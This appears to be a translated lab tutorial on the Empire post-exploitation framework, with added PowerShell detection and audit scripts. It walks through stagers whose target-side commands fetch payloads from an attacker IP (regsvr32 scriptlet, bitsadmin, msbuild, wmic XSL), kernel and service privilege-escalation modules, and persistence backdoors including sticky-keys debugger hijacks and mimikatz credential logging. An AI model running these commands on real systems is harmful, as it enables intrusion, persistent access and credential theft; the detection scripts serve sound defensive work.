Empire (usestager usage, privilege escalation, persistence backdoors)
Prerequisite for this chapter: a listener has already been set up successfully (see the day14 article for how to set up a listener).
1. Several ways to use usestager
windows/launcher_sct:
Introduction: the regsvr32 command is used to register COM components. It is a command provided by Windows for registering or unregistering controls with the system, and it runs in command-line mode. On Windows XP and later, regsvr32.exe lives under Windows\system32; on Windows 2000 it lives under WinNT\system32.
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
1) usestager windows/launcher_sct enters the windows/launcher_sct module
2) Set the parameters:
set Listener kali
set OutFile /var/www/html/xx.sct
3) execute
4) On the target machine, run regsvr32 /u /n /s /i:http://192.168.227.129/xx.sct scrobj.dll
5) A session calls back successfully
windows/launcher_vbs:
Remote download: bitsadmin /transfer n http://IP/xx.vbs path
1) usestager windows/launcher_vbs enters the windows/launcher_vbs module
2) Set the parameters
3) execute
4) Run on the target:
bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\xxx\Desktop\xx.vbs
5) The target executes the .vbs file and a session calls back successfully
windows/launcher_xml:
MSBuild is a free, open-source build toolset, originally for managing native C++ code. Before Visual Studio 2013 MSBuild was part of the .NET Framework; since then it has been bundled with Visual Studio. Visual Studio therefore depends on MSBuild, but MSBuild does not depend on Visual Studio.
Usage: use the MSBuild from .NET 4.0 to run an XML file with injected shellcode and obtain a reverse shell.
1) As in the previous two operations, generate the XML file into the /var/www/html/ folder
2) Download the file on the target
3) On the target, cd to C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and run the XML file with msbuild
4) A session calls back successfully
windows/wmic:
wmic extends WMI (Windows Management Instrumentation) to support system management from the command-line interface and from batch scripts.
Usage: wmic os get /format:"http://IP/xx.xsl"
1) As in the previous steps, save the generated XSL file into the html folder
2) On the target, execute wmic os get /format:"http://192.168.227.129/xx.xsl"
3) A session calls back successfully
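All four stagers above launch a signed Windows binary (regsvr32, bitsadmin, msbuild, wmic) that fetches its payload from a URL, and that command line is what an endpoint can see. As an added example that is not part of the original post, the PowerShell below classifies process command lines against those four patterns. The sample command lines are constructed from the commands in this section, and the Security event 4688 query in the trailing comment assumes that process command-line auditing is enabled.

```powershell
# Added example (not from the original post): flag command lines that match the
# four remote-payload launch patterns used by the stagers in this section.
# Sample lines are constructed; in practice feed the function from Security 4688
# (command-line auditing enabled) or Sysmon event 1.

function Test-RemoteStagerCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Label -> regex. -match is case-insensitive in PowerShell.
    $rules = [ordered]@{
        'regsvr32 remote scriptlet (launcher_sct)' = 'regsvr32(\.exe)?\s.*\/i:\s*"?https?:\/\/.*scrobj\.dll'
        'bitsadmin download (launcher_vbs)'        = 'bitsadmin(\.exe)?\s+\/transfer\s.*https?:\/\/'
        'msbuild on an XML file (launcher_xml)'    = 'msbuild(\.exe)?\s.*\.xml'
        'wmic remote XSL (wmic)'                   = 'wmic(\.exe)?\s.*\/format:\s*"?https?:\/\/'
    }

    $hits = foreach ($name in $rules.Keys) {
        if ($CommandLine -match $rules[$name]) { $name }
    }
    return @($hits)
}

# Constructed sample lines: the four launches from this post plus benign noise.
$samples = @(
    'regsvr32 /u /n /s /i:http://192.168.227.129/xx.sct scrobj.dll',
    'bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\xxx\Desktop\xx.vbs',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\xxx\Desktop\xx.xml',
    'wmic os get /format:"http://192.168.227.129/xx.xsl"',
    'regsvr32 /s C:\Program Files\Vendor\component.dll',   # legitimate local registration
    'msbuild.exe MyProject.sln /t:Build'                      # legitimate build
)

foreach ($line in $samples) {
    $hits = @(Test-RemoteStagerCommandLine -CommandLine $line)
    if ($hits.Count -gt 0) {
        Write-Host "SUSPECT  $line" -ForegroundColor Red
        $hits | ForEach-Object { Write-Host "         -> $_" }
    } else {
        Write-Host "ok       $line"
    }
}

# Real data instead of the samples (Security 4688, CommandLine is property index 8):
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
#   ForEach-Object { $_.Properties[8].Value } |
#   Where-Object { (Test-RemoteStagerCommandLine $_).Count -gt 0 }
```

The msbuild rule is deliberately broad (any .xml argument) and will need tuning on build servers; the regsvr32 and wmic rules key on the URL after /i: and /format:, which ordinary local use never has.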
2. Empire privilege escalation modules
UAC and UAC bypass were introduced on day14
Local privilege escalation
MS16-135: win32k information disclosure vulnerability
To exploit this vulnerability, an attacker must log on to the affected system and run a specially crafted application. The security update fixes the vulnerability by correcting how the Windows kernel handles memory addresses.
searchmodule ms16-135 finds the ms16-135 module
usemodule privesc/ms16-135
Execute after setting the parameters
A privileged session calls back successfully
MS16-032: Secondary Logon privilege escalation vulnerability
A privilege escalation vulnerability exists in Microsoft Windows when the Windows Secondary Logon service fails to properly manage request handles in memory. An attacker who successfully exploits it can run arbitrary code as an administrator.
usemodule privesc/ms16-032
After setting the parameters, execute
A session with SYSTEM privileges is returned successfully
powershell/privesc/sherlock finds Windows local privilege escalation vulnerabilities
usemodule privesc/sherlock loads this module
It lists the local privilege escalation vulnerabilities found
Privilege escalation with PowerUp
PowerUp is a PowerShell tool that helps with local privilege escalation on Windows systems. It contains a variety of methods for identifying and abusing vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings and other escalation opportunities. It is part of PowerTools and lives at https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp . Empire implements PowerUp's escalation functions in the privesc/powerup/* modules.
usemodule privesc/powerup/allchecks checks whether any of the PowerUp weaknesses can be exploited
It shows the findings
Use the corresponding module according to the finding
You can see that a service executable has improperly configured permissions (exploited via the service_exe_* modules)
But I have tried all of them here, and they are not very easy to use
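The weakness the service_exe_* modules rely on is a service binary, or the directory holding it, that low-privileged users can write. As an added example that is not from the original post and not PowerUp's own code, the PowerShell below audits every service for that condition so the ACL can be corrected (only Administrators, SYSTEM and TrustedInstaller should be able to write there). The list of low-privileged principal names is a constructed assumption for an English-language Windows and needs adjusting on localized systems.

```powershell
# Added example (not from the original post or from PowerUp): find services whose
# binary or binary directory grants write access to low-privileged principals.
# Principal names assumed for an English-language Windows install.

$lowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'Everyone', 'NT AUTHORITY\INTERACTIVE')

# Any of these rights lets a low-privileged user replace or retarget the binary.
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
             [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Service PathName may be quoted, unquoted, and may carry arguments.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }   # first .exe of an unquoted path
    return $PathName
}

function Test-LowPrivWritable {
    # Returns the low-privileged principals that hold a write-class Allow ACE on $Path.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $lowPrivPrincipals -contains $_.IdentityReference.Value -and
                       ($_.FileSystemRights -band $writeMask) -ne 0 } |
        ForEach-Object { $_.IdentityReference.Value }
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $bin = Get-ServiceBinaryPath $svc.PathName
    if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { continue }
    $fileWriters = @(Test-LowPrivWritable $bin)
    $dirWriters  = @(Test-LowPrivWritable (Split-Path -LiteralPath $bin -Parent))
    if ($fileWriters.Count -or $dirWriters.Count) {
        [pscustomobject]@{
            Service     = $svc.Name
            RunsAs      = $svc.StartName
            Binary      = $bin
            FileWriters = ($fileWriters -join ', ')
            DirWriters  = ($dirWriters -join ', ')
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize -Wrap }
else { 'No service binaries writable by low-privileged principals.' }
```

A service that runs as LocalSystem and shows up here is the case allchecks reports; the remediation is to reset the file and directory ACLs (icacls) or move the binary under Program Files where the inherited ACL is correct.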
3. Persistence backdoors
PowerBreach
Introduction: PowerBreach is a series of in-memory PowerShell backdoors that provide a variety of trigger options.
persistence/powerbreach/deaduser – accepts a user name and a switch/flag for whether the user name is a domain account (as opposed to a local account). Every sleep seconds the script checks whether the account still exists, and if it does not, it triggers the staging logic. This backdoor does not require local administrator privileges.
Understanding: it checks whether the user name you set still exists (i.e. whether it has been renamed or deleted). When the name changes, the script triggers and a shell calls back.
usemodule persistence/powerbreach/deaduser
View the required parameters
Set the related parameters
execute
Rename AAA to BBB
A shell calls back successfully
persistence/powerbreach/eventlog – queries the security event log at intervals for events containing a unique trigger value. This backdoor requires administrator permission in order to access the security event log.
usemodule persistence/powerbreach/eventlog
View the required parameters
Set the related parameters
execute
Open eventvwr on the target; when the keyword "hacker" (defined in the parameters above, and changeable) appears in the security log,
a session calls back successfully
Because the backdoor was planted with administrator rights, the returned session also has administrator rights
persistence/powerbreach/resolver – takes a host name to resolve and a trigger IP. Every sleep seconds the script checks whether the host name resolves to the trigger IP, and otherwise triggers the staging logic. This backdoor does not require local administrator privileges.
usemodule persistence/powerbreach/resolver
View the required parameters
Set the related parameters
execute
On the target, make the host name resolve to 127.0.0.1
A shell calls back successfully
Userland
The persistence/userland/* modules provide user-mode reboot persistence (i.e. without administrative permissions). If a listener is specified, the staging code for the Empire agent is generated automatically and used as the script logic that is triggered.
persistence/userland/registry – sets a value under HKCU:\Software\Microsoft\Windows\CurrentVersion\Run to execute the script via whichever storage mechanism you choose. The script therefore only runs when that user logs in.
usemodule persistence/userland/registry
View the required parameters
Set the related parameters
execute
Log the target user off and back on; a shell session is returned successfully (a PowerShell window briefly pops up when the user logs in)
persistence/userland/schtasks – configures a scheduled task to execute the script via whichever storage mechanism you choose. The script can be triggered daily at DailyTime (HH:mm format) or after the user has been idle for IdleTime seconds.
Understanding: this is a scheduled task stored in the registry
usemodule persistence/userland/schtasks
View the required parameters
Set the related parameters
execute
Log the target user off and back on; when the set time arrives, a shell session is returned successfully
Elevated
The persistence/elevated/* modules provide reboot persistence from an elevated context (i.e. with administrative privileges). If a listener is specified, the staging code for the Empire agent is generated automatically and used as the script logic that is triggered.
Understanding: these modules are backdoors that require administrator rights
persistence/elevated/registry and persistence/elevated/schtasks are the same as the previous ones, except that administrator permissions are required
persistence/elevated/wmi – configures a permanent WMI subscription to fire the stored script logic. It can be triggered daily at DailyTime (HH:mm format) or at system startup. This one is considerably harder to detect and remove.
Understanding: This is the scheduled task in the registry
usemodule persistence/elevated/wmi
View the required parameters
Set the related parameters
execute
Verify on the target: in PowerShell, run Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "name='updater'"
Restart the target; a shell with administrator permission calls back successfully
misc
persistence/misc/debugger* – in Empire 3.6.0 the persistence/debugger/* modules were merged into persistence/misc/debugger*. It sets Image File Execution Options (also known as a debugger) for various executables that can be reached from the RDP prompt before logging in. By default the debugger is set to cmd.exe, which triggers a command prompt running as SYSTEM over RDP without actually logging on to the computer. You can also use the Binary parameter to specify the path to another binary. If you want the debugger to trigger a stager instead, set the Listener parameter. This generates a suitable stager for the specified listener and stores it at the specified RegPath. You can then trigger these stagers from the pre-authentication RDP prompt, but note that once the RDP prompt closes (which happens after 30 seconds of inactivity) the staged agent is killed.
usemodule persistence/misc/debugger*
View the required parameters
Set the parameters
execute
Press Shift five times at the Windows 7 logon screen on the target; a PowerShell window flashes by
A session with administrator rights is returned successfully
persistence/misc/memssp – installs mimikatz's memssp module, which should log all authentication events to C:\Windows\System32\mimilsa.log. It is not persistent across a reboot.
usemodule persistence/misc/memssp
Just run it directly
The mimilsa.log file is generated in the corresponding directory on the target
persistence/misc/disable_machine_acct_change – prevents the target from changing its computer account password. If you first run mimikatz/credentials/logonpasswords to dump the computer account password (the account name ends in $), you should have persistent access to the given system. A cleanup option is also available.
After loading this module, just run it directly
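Every module in the userland, elevated and misc sections above leaves a fixed artifact behind: a Run value, a scheduled task, a root\subscription filter/consumer pair, an IFEO Debugger value, the Netlogon DisablePasswordChange value, or mimilsa.log. As an added example that is not part of the original post and not Empire's code, the PowerShell below enumerates those locations so an administrator can review and remove what it finds. The registry value name DisablePasswordChange is assumed to be what disable_machine_acct_change sets; the scheduled-task keyword list is a constructed heuristic.

```powershell
# Added example (not from the original post, not Empire's code): enumerate the
# persistence artifacts described above. Run elevated; the HKLM and
# root\subscription checks need administrator rights. Requires PowerShell 3+
# and Get-ScheduledTask (Windows 8/2012+; on Windows 7 use schtasks /query /v).

function Get-RunKeyEntries {
    # userland/registry writes under HKCU, elevated/registry under HKLM
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        foreach ($p in (Get-ItemProperty -Path $k).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath provider metadata
            [pscustomobject]@{ Source = 'RunKey'; Location = "$k\$($p.Name)"; Command = [string]$p.Value }
        }
    }
}

function Get-SuspiciousScheduledTasks {
    # userland/schtasks and elevated/schtasks create a task whose action launches
    # powershell and loads the stager from wherever it was stored (constructed keyword list).
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match 'powershell|pwsh|-enc|IEX|Invoke-Expression|HKCU:|HKLM:') {
                [pscustomobject]@{ Source = 'SchTask'; Location = "$($task.TaskPath)$($task.TaskName)"; Command = $cmd }
            }
        }
    }
}

function Get-WmiPersistence {
    # elevated/wmi registers an __EventFilter, a CommandLineEventConsumer and a binding
    $ns = 'root\subscription'
    foreach ($c in Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue) {
        [pscustomobject]@{ Source = 'WMIConsumer'; Location = $c.Name; Command = $c.CommandLineTemplate }
    }
    foreach ($f in Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue) {
        [pscustomobject]@{ Source = 'WMIFilter'; Location = $f.Name; Command = $f.Query }
    }
}

function Get-IfeoDebuggers {
    # misc/debugger sets a Debugger value for binaries reachable from the logon screen
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    foreach ($sub in Get-ChildItem $ifeo -ErrorAction SilentlyContinue) {
        $dbg = (Get-ItemProperty -Path $sub.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{ Source = 'IFEO'; Location = $sub.PSChildName; Command = $dbg }
        }
    }
}

function Get-MiscIndicators {
    # misc/disable_machine_acct_change: Netlogon\Parameters\DisablePasswordChange = 1 (assumed value name)
    # misc/memssp: C:\Windows\System32\mimilsa.log
    $nl = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters' -ErrorAction SilentlyContinue
    if ($nl.DisablePasswordChange -eq 1) {
        [pscustomobject]@{ Source = 'Netlogon'; Location = 'DisablePasswordChange'; Command = '1 (machine account password rotation disabled)' }
    }
    $log = Join-Path $env:SystemRoot 'System32\mimilsa.log'
    if (Test-Path $log) {
        [pscustomobject]@{ Source = 'memssp'; Location = $log; Command = "exists, $((Get-Item $log).Length) bytes" }
    }
}

$results = @(Get-RunKeyEntries) + @(Get-SuspiciousScheduledTasks) + @(Get-WmiPersistence) +
           @(Get-IfeoDebuggers) + @(Get-MiscIndicators)
if ($results) { $results | Format-Table -AutoSize -Wrap } else { 'No persistence artifacts found.' }
```

A CommandLineEventConsumer named updater, as checked in the wmi section above, shows up under WMIConsumer together with its __EventFilter query; removing the binding and both instances (Remove-CimInstance) is the cleanup. Any IFEO entry for sethc.exe or utilman.exe with a Debugger value is the sticky-keys case from the debugger section and has no legitimate reason to exist.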